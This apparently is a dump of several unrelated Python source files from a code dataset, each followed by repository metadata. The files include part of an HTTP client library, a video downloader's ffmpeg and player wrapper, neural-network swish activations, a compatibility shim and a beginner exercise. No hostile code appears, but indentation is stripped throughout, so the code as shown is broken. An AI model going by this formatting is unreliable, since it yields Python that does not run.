tr_enc = self.headers.get("transfer-encoding")
if tr_enc and tr_enc.lower() == "chunked":
self.chunked = True
self.chunk_left = None
else:
self.chunked = False
# will the connection close at the end of the response?
self.will_close = self._check_close()
# do we have a Content-Length?
# NOTE: RFC 2616, S4.4, #3 says we ignore this if tr_enc is "chunked"
self.length = None
length = self.headers.get("content-length")
# are we using the chunked-style of transfer encoding?
tr_enc = self.headers.get("transfer-encoding")
if length and not self.chunked:
try:
self.length = int(length)
except ValueError:
self.length = None
else:
if self.length < 0: # ignore nonsensical negative lengths
self.length = None
else:
self.length = None
# does the body have a fixed length? (of zero)
if (status == NO_CONTENT or status == NOT_MODIFIED or
100 <= status < 200 or # 1xx codes
self._method == "HEAD"):
self.length = 0
# if the connection remains open, and we aren't using chunked, and
# a content-length was not provided, then assume that the connection
# WILL close.
if (not self.will_close and
not self.chunked and
self.length is None):
self.will_close = True
def _check_close(self):
conn = self.headers.get("connection")
if self.version == 11:
# An HTTP/1.1 proxy is assumed to stay open unless
# explicitly closed.
conn = self.headers.get("connection")
if conn and "close" in conn.lower():
return True
return False
# Some HTTP/1.0 implementations have support for persistent
# connections, using rules different than HTTP/1.1.
# For older HTTP, Keep-Alive indicates persistent connection.
if self.headers.get("keep-alive"):
return False
# At least Akamai returns a "Connection: Keep-Alive" header,
# which was supposed to be sent by the client.
if conn and "keep-alive" in conn.lower():
return False
# Proxy-Connection is a netscape hack.
pconn = self.headers.get("proxy-connection")
if pconn and "keep-alive" in pconn.lower():
return False
# otherwise, assume it will close
return True
def _close_conn(self):
fp = self.fp
self.fp = None
fp.close()
def close(self):
try:
super().close() # set "closed" flag
finally:
if self.fp:
self._close_conn()
# These implementations are for the benefit of io.BufferedReader.
# XXX This class should probably be revised to act more like
# the "raw stream" that BufferedReader expects.
def flush(self):
super().flush()
if self.fp:
self.fp.flush()
def readable(self):
return True
# End of "raw stream" methods
def isclosed(self):
"""True if the connection is closed."""
# NOTE: it is possible that we will not ever call self.close(). This
# case occurs when will_close is TRUE, length is None, and we
# read up to the last byte, but NOT past it.
#
# IMPLIES: if will_close is FALSE, then self.close() will ALWAYS be
# called, meaning self.isclosed() is meaningful.
return self.fp is None
def read(self, amt=None):
if self.fp is None:
return b""
if self._method == "HEAD":
self._close_conn()
return b""
if amt is not None:
# Amount is given, implement using readinto
b = bytearray(amt)
n = self.readinto(b)
return memoryview(b)[:n].tobytes()
else:
# Amount is not given (unbounded read) so we must check self.length
# and self.chunked
if self.chunked:
return self._readall_chunked()
if self.length is None:
s = self.fp.read()
else:
try:
s = self._safe_read(self.length)
except IncompleteRead:
self._close_conn()
raise
self.length = 0
self._close_conn() # we read everything
return s
def readinto(self, b):
if self.fp is None:
return 0
if self._method == "HEAD":
self._close_conn()
return 0
if self.chunked:
return self._readinto_chunked(b)
if self.length is not None:
if len(b) > self.length:
# clip the read to the "end of response"
b = memoryview(b)[0:self.length]
# we do not use _safe_read() here because this may be a .will_close
# connection, and the user is reading more bytes than will be provided
# (for example, reading in 1k chunks)
n = self.fp.readinto(b)
if not n and b:
# Ideally, we would raise IncompleteRead if the content-length
# wasn't satisfied, but it might break compatibility.
self._close_conn()
elif self.length is not None:
self.length -= n
if not self.length:
self._close_conn()
return n
def _read_next_chunk_size(self):
# Read the next chunk size from the file
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("chunk size")
i = line.find(b";")
if i >= 0:
line = line[:i] # strip chunk-extensions
try:
return int(line, 16)
except ValueError:
# close the connection as protocol synchronisation is
# probably lost
self._close_conn()
raise
def _read_and_discard_trailer(self):
# read and discard trailer up to the CRLF terminator
### note: we shouldn't have any trailers!
while True:
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("trailer line")
if not line:
# a vanishingly small number of sites EOF without
# sending the trailer
break
if line in (b'\r\n', b'\n', b''):
break
def _get_chunk_left(self):
# return self.chunk_left, reading a new chunk if necessary.
# chunk_left == 0: at the end of the current chunk, need to close it
# chunk_left == None: No current chunk, should read next.
# This function returns non-zero or None if the last chunk has
# been read.
chunk_left = self.chunk_left
if not chunk_left: # Can be 0 or None
if chunk_left is not None:
# We are at the end of chunk. dicard chunk end
self._safe_read(2) # toss the CRLF at the end of the chunk
try:
chunk_left = self._read_next_chunk_size()
except ValueError:
raise IncompleteRead(b'')
if chunk_left == 0:
# last chunk: 1*("0") [ chunk-extension ] CRLF
self._read_and_discard_trailer()
# we read everything; close the "file"
self._close_conn()
chunk_left = None
self.chunk_left = chunk_left
return chunk_left
def _readall_chunked(self):
assert self.chunked != _UNKNOWN
value = []
try:
while True:
chunk_left = self._get_chunk_left()
if chunk_left is None:
break
value.append(self._safe_read(chunk_left))
self.chunk_left = 0
return b''.join(value)
except IncompleteRead:
raise IncompleteRead(b''.join(value))
def _readinto_chunked(self, b):
assert self.chunked != _UNKNOWN
total_bytes = 0
mvb = memoryview(b)
try:
while True:
chunk_left = self._get_chunk_left()
if chunk_left is None:
return total_bytes
if len(mvb) <= chunk_left:
n = self._safe_readinto(mvb)
self.chunk_left = chunk_left - n
return total_bytes + n
temp_mvb = mvb[:chunk_left]
n = self._safe_readinto(temp_mvb)
mvb = mvb[n:]
total_bytes += n
self.chunk_left = 0
except IncompleteRead:
raise IncompleteRead(bytes(b[0:total_bytes]))
def _safe_read(self, amt):
"""Read the number of bytes requested, compensating for partial reads.
Normally, we have a blocking socket, but a read() can be interrupted
by a signal (resulting in a partial read).
Note that we cannot distinguish between EOF and an interrupt when zero
bytes have been read. IncompleteRead() will be raised in this
situation.
This function should be used when <amt> bytes "should" be present for
reading. If the bytes are truly not available (due to EOF), then the
IncompleteRead exception can be used to detect the problem.
"""
s = []
while amt > 0:
chunk = self.fp.read(min(amt, MAXAMOUNT))
if not chunk:
raise IncompleteRead(b''.join(s), amt)
s.append(chunk)
amt -= len(chunk)
return b"".join(s)
def _safe_readinto(self, b):
"""Same as _safe_read, but for reading into a buffer."""
total_bytes = 0
mvb = memoryview(b)
while total_bytes < len(b):
if MAXAMOUNT < len(mvb):
temp_mvb = mvb[0:MAXAMOUNT]
n = self.fp.readinto(temp_mvb)
else:
n = self.fp.readinto(mvb)
if not n:
raise IncompleteRead(bytes(mvb[0:total_bytes]), len(b))
mvb = mvb[n:]
total_bytes += n
return total_bytes
def read1(self, n=-1):
"""Read with at most one underlying system call. If at least one
byte is buffered, return that instead.
"""
if self.fp is None or self._method == "HEAD":
return b""
if self.chunked:
return self._read1_chunked(n)
if self.length is not None and (n < 0 or n > self.length):
n = self.length
try:
result = self.fp.read1(n)
except ValueError:
if n >= 0:
raise
# some implementations, like BufferedReader, don't support -1
# Read an arbitrarily selected largeish chunk.
result = self.fp.read1(16*1024)
if not result and n:
self._close_conn()
elif self.length is not None:
self.length -= len(result)
return result
def peek(self, n=-1):
# Having this enables IOBase.readline() to read more than one
# byte at a time
if self.fp is None or self._method == "HEAD":
return b""
if self.chunked:
return self._peek_chunked(n)
return self.fp.peek(n)
def readline(self, limit=-1):
if self.fp is None or self._method == "HEAD":
return b""
if self.chunked:
# Fallback to IOBase readline which uses peek() and read()
return super().readline(limit)
if self.length is not None and (limit < 0 or limit > self.length):
limit = self.length
result = self.fp.readline(limit)
if not result and limit:
self._close_conn()
elif self.length is not None:
self.length -= len(result)
return result
def _read1_chunked(self, n):
# Strictly speaking, _get_chunk_left() may cause more than one read,
# but that is ok, since that is to satisfy the chunked protocol.
chunk_left = self._get_chunk_left()
if chunk_left is None or n == 0:
return b''
if not (0 <= n <= chunk_left):
n = chunk_left # if n is negative or larger than chunk_left
read = self.fp.read1(n)
self.chunk_left -= len(read)
if not read:
raise IncompleteRead(b"")
return read
def _peek_chunked(self, n):
# Strictly speaking, _get_chunk_left() may cause more than one read,
# but that is ok, since that is to satisfy the chunked protocol.
try:
chunk_left = self._get_chunk_left()
except IncompleteRead:
return b'' # peek doesn't worry about protocol
if chunk_left is None:
return b'' # eof
# peek is allowed to return more than requested. Just request the
# entire chunk, and truncate what we get.
return self.fp.peek(chunk_left)[:chunk_left]
def fileno(self):
return self.fp.fileno()
def getheader(self, name, default=None):
if self.headers is None:
raise ResponseNotReady()
headers = self.headers.get_all(name) or default
if isinstance(headers, str) or not hasattr(headers, '__iter__'):
return headers
else:
return ', '.join(headers)
def getheaders(self):
"""Return list of (header, value) tuples."""
if self.headers is None:
raise ResponseNotReady()
return list(self.headers.items())
# We override IOBase.__iter__ so that it doesn't check for closed-ness
def __iter__(self):
return self
# For compatibility with old-style urllib responses.
def info(self):
return self.headers
def geturl(self):
return self.url
def getcode(self):
return self.status
class HTTPConnection:
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
response_class = HTTPResponse
default_port = HTTP_PORT
auto_open = 1
debuglevel = 0
def __init__(self, host, port=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
self.timeout = timeout
self.source_address = source_address
self.sock = None
self._buffer = []
self.__response = None
self.__state = _CS_IDLE
self._method = None
self._tunnel_host = None
self._tunnel_port = None
self._tunnel_headers = {}
(self.host, self.port) = self._get_hostport(host, port)
# This is stored as an instance variable to allow unit
# tests to replace it with a suitable mockup
self._create_connection = socket.create_connection
def set_tunnel(self, host, port=None, headers=None):
"""Set up host and port for HTTP CONNECT tunnelling.
In a connection that uses HTTP CONNECT tunneling, the host passed to the
constructor is used as a proxy server that relays all communication to
the endpoint passed to `set_tunnel`. This done by sending an HTTP
CONNECT request to the proxy server when the connection is established.
This method must be called before the HTML connection has been
established.
The headers argument should be a mapping of extra HTTP headers to send
with the CONNECT request.
"""
if self.sock:
raise RuntimeError("Can't set up tunnel for established connection")
self._tunnel_host, self._tunnel_port = self._get_hostport(host, port)
if headers:
self._tunnel_headers = headers
else:
self._tunnel_headers.clear()
def _get_hostport(self, host, port):
if port is None:
i = host.rfind(':')
j = host.rfind(']') # ipv6 addresses have [...]
if i > j:
try:
port = int(host[i+1:])
except ValueError:
if host[i+1:] == "": # http://foo.com:/ == http://foo.com/
port = self.default_port
else:
raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
host = host[:i]
else:
port = self.default_port
if host and host[0] == '[' and host[-1] == ']':
host = host[1:-1]
return (host, port)
def set_debuglevel(self, level):
self.debuglevel = level
def _tunnel(self):
connect_str = "CONNECT %s:%d HTTP/1.0\r\n" % (self._tunnel_host,
self._tunnel_port)
connect_bytes = connect_str.encode("ascii")
self.send(connect_bytes)
for header, value in self._tunnel_headers.items():
header_str = "%s: %s\r\n" % (header, value)
header_bytes = header_str.encode("latin-1")
self.send(header_bytes)
self.send(b'\r\n')
response = self.response_class(self.sock, method=self._method)
(version, code, message) = response._read_status()
if code != http.HTTPStatus.OK:
self.close()
raise OSError("Tunnel connection failed: %d %s" % (code,
message.strip()))
while True:
line = response.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("header line")
if not line:
# for sites which EOF without sending a trailer
break
if line in (b'\r\n', b'\n', b''):
break
if self.debuglevel > 0:
print('header:', line.decode())
def connect(self):
"""Connect to the host and port specified in __init__."""
self.sock = self._create_connection(
(self.host,self.port), self.timeout, self.source_address)
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if self._tunnel_host:
self._tunnel()
def close(self):
"""Close the connection to the HTTP server."""
self.__state = _CS_IDLE
try:
sock = self.sock
if sock:
self.sock = None
sock.close() # close it manually... there may be other refs
finally:
response = self.__response
if response:
self.__response = None
response.close()
def send(self, data):
"""Send `data' to the server.
``data`` can be a string object, a bytes object, an array object, a
file-like object that supports a .read() method, or an iterable object.
"""
if self.sock is None:
if self.auto_open:
self.connect()
else:
raise NotConnected()
if self.debuglevel > 0:
print("send:", repr(data))
blocksize = 8192
if hasattr(data, "read") :
if self.debuglevel > 0:
print("sendIng a read()able")
encode = False
try:
mode = data.mode
except AttributeError:
# io.BytesIO and other file-like objects don't have a `mode`
# attribute.
pass
else:
if "b" not in mode:
encode = True
if self.debuglevel > 0:
print("encoding file using iso-8859-1")
while 1:
datablock = data.read(blocksize)
if not datablock:
break
if encode:
datablock = datablock.encode("iso-8859-1")
self.sock.sendall(datablock)
return
try:
self.sock.sendall(data)
except TypeError:
if isinstance(data, collections.Iterable):
for d in data:
self.sock.sendall(d)
else:
raise TypeError("data should be a bytes-like object "
"or an iterable, got %r" % type(data))
def _output(self, s):
"""Add a line of output to the current request buffer.
Assumes that the line does *not* end with \\r\\n.
"""
self._buffer.append(s)
def _send_output(self, message_body=None):
"""Send the currently buffered request and clear the buffer.
Appends an extra \\r\\n to the buffer.
A message_body may be specified, to be appended to the request.
"""
self._buffer.extend((b"", b""))
msg = b"\r\n".join(self._buffer)
del self._buffer[:]
self.send(msg)
if message_body is not None:
self.send(message_body)
def putrequest(self, method, url, skip_host=0, skip_accept_encoding=0):
"""Send a request to the server.
`method' specifies an HTTP request method, e.g. 'GET'.
`url' specifies the object being requested, e.g. '/index.html'.
`skip_host' if True does not add automatically a 'Host:' header
`skip_accept_encoding' if True does not add automatically an
'Accept-Encoding:' header
"""
# if a prior response has been completed, then forget about it.
if self.__response and self.__response.isclosed():
self.__response = None
# in certain cases, we cannot issue another request on this connection.
# this occurs when:
# 1) we are in the process of sending a request. (_CS_REQ_STARTED)
# 2) a response to a previous request has signalled that it is going
# to close the connection upon completion.
# 3) the headers for the previous response have not been read, thus
# we cannot determine whether point (2) is true. (_CS_REQ_SENT)
#
# if there is no prior response, then we can request at will.
#
# if point (2) is true, then we will have passed the socket to the
# response (effectively meaning, "there is no prior response"), and
# will open a new one when a new request is made.
#
# Note: if a prior response exists, then we *can* start a new request.
# We are not allowed to begin fetching the response to this new
# request, however, until that prior response is complete.
#
if self.__state == _CS_IDLE:
self.__state = _CS_REQ_STARTED
else:
raise CannotSendRequest(self.__state)
# Save the method we use, we need it later in the response phase
self._method = method
if not url:
url = '/'
request = '%s %s %s' % (method, url, self._http_vsn_str)
# Non-ASCII characters should have been eliminated earlier
self._output(request.encode('ascii'))
if self._http_vsn == 11:
# Issue some standard headers for better HTTP/1.1 compliance
if not skip_host:
# this header is issued *only* for HTTP/1.1
# connections. more specifically, this means it is
# only issued when the client uses the new
# HTTPConnection() class. backwards-compat clients
# will be using HTTP/1.0 and those clients may be
# issuing this header themselves. we should NOT issue
# it twice; some web servers (such as Apache) barf
# when they see two Host: headers
# If we need a non-standard port,include it in the
# header. If the request is going through a proxy,
# but the host of the actual URL, not the host of the
# proxy.
netloc = ''
if url.startswith('http'):
nil, netloc, nil, nil, nil = urlsplit(url)
if netloc:
try:
netloc_enc = netloc.encode("ascii")
except UnicodeEncodeError:
netloc_enc = netloc.encode("idna")
self.putheader('Host', netloc_enc)
else:
if self._tunnel_host:
host = self._tunnel_host
port = self._tunnel_port
else:
host = self.host
port = self.port
try:
host_enc = host.encode("ascii")
except UnicodeEncodeError:
host_enc = host.encode("idna")
# As per RFC 273, IPv6 address should be wrapped with []
# when used as Host header
if host.find(':') >= 0:
host_enc = b'[' + host_enc + b']'
if port == self.default_port:
self.putheader('Host', host_enc)
else:
host_enc = host_enc.decode("ascii")
self.putheader('Host', "%s:%s" % (host_enc, port))
# note: we are assuming that clients will not attempt to set these
# headers since *this* library must deal with the
# consequences. this also means that when the supporting
# libraries are updated to recognize other forms, then this
# code should be changed (removed or updated).
# we only want a Content-Encoding of "identity" since we don't
# support encodings such as x-gzip or x-deflate.
if not skip_accept_encoding:
self.putheader('Accept-Encoding', 'identity')
# we can accept "chunked" Transfer-Encodings, but no others
# NOTE: no TE header implies *only* "chunked"
#self.putheader('TE', 'chunked')
# if TE is supplied in the header, then it must appear in a
# Connection header.
#self.putheader('Connection', 'TE')
else:
# For HTTP/1.0, the server will assume "not chunked"
pass
def putheader(self, header, *values):
"""Send a request header line to the server.
For example: h.putheader('Accept', 'text/html')
"""
if self.__state != _CS_REQ_STARTED:
raise CannotSendHeader()
if hasattr(header, 'encode'):
header = header.encode('ascii')
if not _is_legal_header_name(header):
raise ValueError('Invalid header name %r' % (header,))
values = list(values)
for i, one_value in enumerate(values):
if hasattr(one_value, 'encode'):
values[i] = one_value.encode('latin-1')
elif isinstance(one_value, int):
values[i] = str(one_value).encode('ascii')
if _is_illegal_header_value(values[i]):
raise ValueError('Invalid header value %r' % (values[i],))
value = b'\r\n\t'.join(values)
header = header + b': ' + value
self._output(header)
def endheaders(self, message_body=None):
"""Indicate that the last header line has been sent to the server.
This method sends the request to the server. The optional message_body
argument can be used to pass a message body associated with the
request. The message body will be sent in the same packet as the
message headers if it is a string, otherwise it is sent as a separate
packet.
"""
if self.__state == _CS_REQ_STARTED:
self.__state = _CS_REQ_SENT
else:
raise CannotSendHeader()
self._send_output(message_body)
def request(self, method, url, body=None, headers={}):
"""Send a complete request to the server."""
self._send_request(method, url, body, headers)
def _set_content_length(self, body, method):
# Set the content-length based on the body. If the body is "empty", we
# set Content-Length: 0 for methods that expect a body (RFC 7230,
# Section 3.3.2). If the body is set for other methods, we set the
# header provided we can figure out what the length is.
thelen = None
method_expects_body = method.upper() in _METHODS_EXPECTING_BODY
if body is None and method_expects_body:
thelen = '0'
elif body is not None:
try:
thelen = str(len(body))
except TypeError:
# If this is a file-like object, try to
# fstat its file descriptor
try:
thelen = str(os.fstat(body.fileno()).st_size)
except (AttributeError, OSError):
# Don't send a length if this failed
if self.debuglevel > 0: print("Cannot stat!!")
if thelen is not None:
self.putheader('Content-Length', thelen)
def _send_request(self, method, url, body, headers):
# Honor explicitly requested Host: and Accept-Encoding: headers.
header_names = dict.fromkeys([k.lower() for k in headers])
skips = {}
if 'host' in header_names:
skips['skip_host'] = 1
if 'accept-encoding' in header_names:
skips['skip_accept_encoding'] = 1
self.putrequest(method, url, **skips)
if 'content-length' not in header_names:
self._set_content_length(body, method)
for hdr, value in headers.items():
self.putheader(hdr, value)
if isinstance(body, str):
# RFC 2616 Section 3.7.1 says that text default has a
# default charset of iso-8859-1.
body = _encode(body, 'body')
self.endheaders(body)
def getresponse(self):
"""Get the response from the server.
If the HTTPConnection is in the correct state, returns an
instance of HTTPResponse or of whatever object is returned by
the response_class variable.
If a request has not been sent or if a previous response has
not be handled, ResponseNotReady is raised. If the HTTP
response indicates that the connection should be closed, then
it will be closed before the response is returned. When the
connection is closed, the underlying socket is closed.
"""
# if a prior response has been completed, then forget about it.
if self.__response and self.__response.isclosed():
self.__response = None
# if a prior response exists, then it must be completed (otherwise, we
# cannot read this response's header to determine the connection-close
# behavior)
#
# note: if a prior response existed, but was connection-close, then the
# socket and response were made independent of this HTTPConnection
# object since a new request requires that we open a whole new
# connection
#
# this means the prior response had one of two states:
# 1) will_close: this connection was reset and the prior socket and
# response operate independently
# 2) persistent: the response was retained and we await its
# isclosed() status to become true.
#
if self.__state != _CS_REQ_SENT or self.__response:
raise ResponseNotReady(self.__state)
if self.debuglevel > 0:
response = self.response_class(self.sock, self.debuglevel,
method=self._method)
else:
response = self.response_class(self.sock, method=self._method)
try:
try:
response.begin()
except ConnectionError:
self.close()
raise
assert response.will_close != _UNKNOWN
self.__state = _CS_IDLE
if response.will_close:
# this effectively passes the connection to the response
self.close()
else:
# remember this, so we can tell when it is complete
self.__response = response
return response
except:
response.close()
raise
try:
import ssl
except ImportError:
pass
else:
class HTTPSConnection(HTTPConnection):
"This class allows communication via SSL."
default_port = HTTPS_PORT
# XXX Should key_file and cert_file be deprecated in favour of context?
def __init__(self, host, port=None, key_file=None, cert_file=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None, *, context=None,
check_hostname=None):
super(HTTPSConnection, self).__init__(host, port, timeout,
source_address)
self.key_file = key_file
self.cert_file = cert_file
if context is None:
context = ssl._create_default_https_context()
will_verify = context.verify_mode != ssl.CERT_NONE
if check_hostname is None:
check_hostname = context.check_hostname
if check_hostname and not will_verify:
raise ValueError("check_hostname needs a SSL context with "
"either CERT_OPTIONAL or CERT_REQUIRED")
if key_file or cert_file:
context.load_cert_chain(cert_file, key_file)
self._context = context
self._check_hostname = check_hostname
def connect(self):
"Connect to a host on a given (SSL) port."
super().connect()
if self._tunnel_host:
server_hostname = self._tunnel_host
else:
server_hostname = self.host
self.sock = self._context.wrap_socket(self.sock,
server_hostname=server_hostname)
if not self._context.check_hostname and self._check_hostname:
try:
ssl.match_hostname(self.sock.getpeercert(), server_hostname)
except Exception:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
__all__.append("HTTPSConnection")
class HTTPException(Exception):
# Subclasses that define an __init__ must call Exception.__init__
# or define self.args. Otherwise, str() will fail.
pass
class NotConnected(HTTPException):
pass
class InvalidURL(HTTPException):
pass
class UnknownProtocol(HTTPException):
def __init__(self, version):
self.args = version,
self.version = version
class UnknownTransferEncoding(HTTPException):
pass
class UnimplementedFileMode(HTTPException):
pass
class IncompleteRead(HTTPException):
def __init__(self, partial, expected=None):
self.args = partial,
self.partial = partial
self.expected = expected
def __repr__(self):
if self.expected is not None:
e = ', %i more expected' % self.expected
else:
e = ''
return '%s(%i bytes read%s)' % (self.__class__.__name__,
len(self.partial), e)
def __str__(self):
return repr(self)
class ImproperConnectionState(HTTPException):
pass
class CannotSendRequest(ImproperConnectionState):
pass
class CannotSendHeader(ImproperConnectionState):
pass
class ResponseNotReady(ImproperConnectionState):
pass
class BadStatusLine(HTTPException):
def __init__(self, line):
if not line:
line = repr(line)
self.args = line,
self.line = line
class LineTooLong(HTTPException):
def __init__(self, line_type):
HTTPException.__init__(self, "got more than %d bytes when reading %s"
% (_MAXLINE, line_type))
class RemoteDisconnected(ConnectionResetError, BadStatusLine):
def __init__(self, *pos, **kw):
BadStatusLine.__init__(self, "")
ConnectionResetError.__init__(self, *pos, **kw)
# for backwards compatibility
error = HTTPException
| [
"[email protected]"
] | |
ca32ac6e38b9a3d4b55c6c625ef3bc8c727a7bb3 | 3c17e189622018329bc0ebd8523eae8db9f3112a | /ykdl/util/wrap.py | de6d61b463f96d1bc0bb8f01bef4d73c3470f3b0 | [
"MIT"
] | permissive | YU-zreo/ykdl | 167c9b8715a1cecf57c18bf60c7da3b22437ad06 | b59dacd78bcec79d208d7cb86b86fa65428e386a | refs/heads/master | 2020-12-02T12:47:01.113309 | 2017-07-07T12:39:20 | 2017-07-07T12:39:20 | 96,594,712 | 1 | 0 | null | 2017-07-08T03:57:22 | 2017-07-08T03:57:21 | null | UTF-8 | Python | false | false | 1,580 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import shlex
from logging import getLogger
logger = getLogger("wrap")
from ykdl.compact import compact_tempfile
def launch_player(player, urls, **args):
if 'mpv' in player:
cmd = shlex.split(player) + ['--demuxer-lavf-o=protocol_whitelist=[file,tcp,http]']
if args["ua"]:
cmd += ["--user-agent={}".format(args["ua"])]
if args["referer"]:
cmd += ["--referrer={}".format(args["referer"])]
cmd += list(urls)
else:
cmd = shlex.split(player) + list(urls)
subprocess.call(cmd)
def launch_ffmpeg(basename, ext, lenth):
#build input
inputfile = compact_tempfile(mode='w+t', suffix='.txt', dir='.', encoding='utf-8')
for i in range(lenth):
inputfile.write('file \'%s_%d_.%s\'\n' % (basename, i, ext))
inputfile.flush()
outputfile = basename+ '.' + ext
cmd = ['ffmpeg','-f', 'concat', '-safe', '-1', '-y', '-i', inputfile.name, '-c', 'copy', '-hide_banner']
if ext == 'mp4':
cmd += ['-absf', 'aac_adtstoasc']
cmd.append(outputfile)
print('Merging video %s using ffmpeg:' % basename)
subprocess.call(cmd)
def launch_ffmpeg_download(url, name, live):
print('Now downloading: %s' % name)
if live:
print('stop downloading by press \'q\'')
cmd = ['ffmpeg', '-y']
if not url.startswith('http'):
cmd += ['-protocol_whitelist', 'file,tcp,http' ]
cmd += ['-i', url, '-c', 'copy', '-absf', 'aac_adtstoasc', '-hide_banner', name]
subprocess.call(cmd)
| [
"[email protected]"
] | |
5a4d7837248354b88c88b465c3cbd58a4b15c328 | 0b1e404a165c960677d07015bc26aac0569cf84a | /src/combustion/nn/activations/swish.py | de70fb4f298b010d397300b048a83d7107bb6a6f | [
"Apache-2.0"
] | permissive | johndpope/combustion | d3ec349cd7be086f55b4e3deebd571c97842e1ed | c3f91e62a10a873cfeeae8c675b0683bc5158818 | refs/heads/master | 2023-03-01T14:34:42.149415 | 2021-02-07T17:55:58 | 2021-02-13T17:17:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,077 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
# implementation inspired by
# https://github.com/lukemelas/EfficientNet-PyTorch/blob/master/efficientnet_pytorch/utils.py
class _SwishFunction(torch.autograd.Function):
@staticmethod
def forward(ctx, i):
result = i * torch.sigmoid(i)
ctx.save_for_backward(i)
return result
@staticmethod
def backward(ctx, grad_output):
for i in ctx.saved_tensors:
sigmoid_i = torch.sigmoid(i)
return grad_output * (sigmoid_i * (1 + i * (1 - sigmoid_i)))
def swish(inputs: Tensor, memory_efficient: bool = True) -> Tensor:
r"""The swish activation function, defined as
.. math::
f(x) = x \cdot \text{sigmoid}(x)
Args:
inputs (Tensor):
The input tensor
memory_efficient (bool, optional):
Whether or not to use an implementation that is more memory efficient at training
time. When ``memory_efficient=True``, this method is incompatible with TorchScript.
.. warning::
This method is traceable with TorchScript when ``memory_efficient=False``, but is
un-scriptable due to the use of :class:`torch.autograd.Function` for a
memory-efficient backward pass. Please export using :func:`torch.jit.trace` with
``memory_efficient=False``
"""
if memory_efficient:
return _SwishFunction.apply(inputs)
else:
return inputs * torch.sigmoid(inputs)
class Swish(nn.Module):
r"""The swish activation function, defined as
.. math::
f(x) = x \cdot \text{sigmoid}(x)
.. warning::
This method is traceable with TorchScript, but is un-scriptable due to the
use of :class:`torch.autograd.Function` for a memory-efficient backward pass.
Please export using :func:`torch.jit.trace` after calling ``module.eval()``.
"""
@torch.jit.ignore
def _memory_efficient_forward(self, inputs: Tensor) -> Tensor:
return swish(inputs)
def forward(self, inputs: Tensor) -> Tensor:
if not self.training:
return self._memory_efficient_forward(inputs)
else:
return inputs * torch.sigmoid(inputs)
def hard_swish(inputs: Tensor, inplace: bool = False) -> Tensor:
r"""The hard swish activation function proposed in
`Searching For MobileNetV3`_, defined as
.. math::
f(x) = x \cdot \frac{\text{ReLU6}(x + 3)}{6}
Hard swish approximates the swish activation, but computationally cheaper due to the
removal of :math:`\text{sigmoid}(x)`.
Args:
inputs (Tensor):
The input tensor
inplace (bool, optional):
Whether or not to perform the operation in place.
.. _Searching for MobileNetV3:
https://arxiv.org/abs/1905.02244
"""
if inplace:
return inputs.mul_(F.relu6(inputs + 3, inplace=True).div_(6))
else:
return F.relu6(inputs + 3).div(6).mul(inputs)
class HardSwish(nn.Module):
r"""The hard swish activation function proposed in
`Searching For MobileNetV3`_, defined as
.. math::
f(x) = x \cdot \frac{\text{ReLU6}(x + 3)}{6}
Hard swish approximates the swish activation, but computationally cheaper due to the
removal of :math:`\text{sigmoid}(x)`.
.. image:: ./hswish.png
:width: 600px
:align: center
:height: 300px
:alt: Comparison of Hard Swish and Swish activations.
Args:
inplace (bool, optional):
Whether or not to perform the operation in place.
.. _Searching for MobileNetV3:
https://arxiv.org/abs/1905.02244
"""
def __init__(self, inplace: bool = False):
super().__init__()
self.inplace = inplace
def extra_repr(self):
if self.inplace:
return "inplace=True"
else:
return ""
def forward(self, inputs: Tensor) -> Tensor:
return hard_swish(inputs, self.inplace)
| [
"[email protected]"
] | |
f784b3a01ba171e37e1998ab9f4997ed520f1cbe | 22622d1899ac2a37c66d776e317a7c752b2fb10e | /rio/_compat.py | 3e05ed7366dbb45a1f3df523a9be3de33fa28f95 | [
"MIT"
] | permissive | soasme/rio | 64bb3e24580c18951d5eaf84809216785ae35020 | e6b89634db8d3ad75ac7f7b25ddec5b19d4f66e2 | refs/heads/master | 2022-01-23T01:48:17.445050 | 2019-12-30T02:36:50 | 2019-12-30T02:36:50 | 55,581,621 | 0 | 1 | MIT | 2019-12-30T02:39:58 | 2016-04-06T06:34:59 | Python | UTF-8 | Python | false | false | 315 | py | # -*- coding: utf-8 -*-
"""
rio._compact
~~~~~~~~~~~~~
"""
try:
import cPickle as pickle
except ImportError:
import pickle # noqa
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO # noqa
try:
import simplejson as json
except ImportError:
import json
| [
"[email protected]"
] | |
c07b1b463ef553ac6896b1ab101ae7c439731385 | c56ffb7215547b658e6698bc4bbe78fbd0e3330b | /3.1 Conditional Statements Advanced - Exercise/02-summerOutfit.py | 9fe22dd121ed0949664396b2184c89cbc50fc5bd | [] | no_license | byAbaddon/Basics-Course-Python-November-2020 | 344646bbb33740d15bec94fd5b5d7cd257df9220 | c6c17a5cdc29121d706bc7677a61637a9bcefbb1 | refs/heads/main | 2023-04-16T01:00:10.000371 | 2023-04-10T20:46:11 | 2023-04-10T20:46:11 | 316,531,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | degrees = int(input())
day_time = input()
result = 0
data_dict = {
'm': {'Morning':'Sweatshirt and Sneakers', 'Afternoon': 'Shirt and Moccasins', 'Evening': 'Shirt and Moccasins'},
'a': {'Morning':'Shirt and Moccasins', 'Afternoon': 'T-Shirt and Sandals', 'Evening': 'Shirt and Moccasins'},
'e': {'Morning':'T-Shirt and Sandals', 'Afternoon': 'Swim Suit and Barefoot', 'Evening': 'Shirt and Moccasins'},
}
if 10 <= degrees <= 18:
result = data_dict['m'][day_time]
elif 18 < degrees <= 24:
result = data_dict['a'][day_time]
elif degrees >= 25:
result = data_dict['e'][day_time]
print(f"It's {degrees} degrees, get your {result}.")
'''
16
Morning
---------------
16
Afternoon
---------------
22
Afternoon
---------------
28
Evening
'''
| [
